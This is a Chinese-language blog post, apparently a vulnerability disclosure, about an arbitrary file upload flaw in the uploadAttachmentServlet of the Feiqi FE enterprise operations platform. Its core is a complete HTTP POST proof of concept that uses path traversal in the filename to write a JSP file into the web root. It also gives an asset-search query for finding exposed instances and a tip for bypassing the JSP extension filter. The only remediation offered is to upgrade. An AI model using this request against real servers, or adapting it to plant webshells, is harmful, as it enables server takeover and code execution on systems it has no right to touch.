飞企互联-FE企业运营管理平台uploadAttachmentServlet 任意文件上传漏洞

产品简介

飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。这个平台可以连接人、链接端、联通内外,支持企业B2B、C2B与O2O等核心需求,为不同行业客户的互联网+转型提供支持。其特色在于提供云端工作环境,整合了人工智能、大数据分析和物联网设备管理,为不同行业客户的互联网+转型提供全面支持。通过智能化的决策支持和数据驱动的业务优化,企业可以更灵活、高效地运营业务,实现数字化转型的战略目标。

漏洞概述

飞企互联-FE企业运营管理平台 uploadAttachmentServlet存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个 web 服务器。

资产测绘

app=“飞企互联-FE企业运营管理平台”
在这里插入图片描述

漏洞复现

Poc:

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Length: 325

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/from.jsp"
Content-Type: text/plain

<% out.println("123123");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

在这里插入图片描述
在这里jsp会被进行规则限制,可通过解析绕过在文件后加个进行绕过
在这里插入图片描述

修复建议

升级至最新安全版本。

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-25 23:44:04       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-25 23:44:04       106 阅读
  3. 在Django里面运行非项目文件

    2024-03-25 23:44:04       87 阅读
  4. Python语言-面向对象

    2024-03-25 23:44:04       96 阅读

热门阅读

  1. HashMap的底层结构

    2024-03-25 23:44:04       45 阅读
  2. rsync同步/传输工具ssh使用方法

    2024-03-25 23:44:04       38 阅读
  3. 什么是电磁爆

    2024-03-25 23:44:04       45 阅读
  4. python之内存管理

    2024-03-25 23:44:04       40 阅读
  5. C#关键字 namespace

    2024-03-25 23:44:04       45 阅读
  6. linux下用docker部署es和kibana(一)

    2024-03-25 23:44:04       42 阅读
  7. C++初阶:string类模拟实现

    2024-03-25 23:44:04       38 阅读
  8. mvvm/mvc/mvp三者区别

    2024-03-25 23:44:04       35 阅读
  9. 5.5.9、【AI技术新纪元:Spring AI解码】Qdrant

    2024-03-25 23:44:04       40 阅读
  10. 2024/3/24 蓝桥杯

    2024-03-25 23:44:04       48 阅读
  11. 每日OJ题_子数组子串dp⑤_力扣413. 等差数列划分

    2024-03-25 23:44:04       43 阅读
  12. MySQL 存储引擎

    2024-03-25 23:44:04       41 阅读
  13. 深入理解JWT

    2024-03-25 23:44:04       39 阅读
  14. 深入了解Flutter中Future的全部工厂方法及使用

    2024-03-25 23:44:04       36 阅读
  15. C#的DataTable分页

    2024-03-25 23:44:04       42 阅读
  16. C# 接口_索引器_命名空间

    2024-03-25 23:44:04       36 阅读
  17. C# 封装

    2024-03-25 23:44:04       42 阅读